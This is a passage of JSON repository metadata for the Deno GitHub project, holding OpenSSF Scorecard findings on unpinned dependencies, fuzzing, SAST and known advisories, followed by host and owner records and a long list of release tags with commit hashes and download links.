https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitH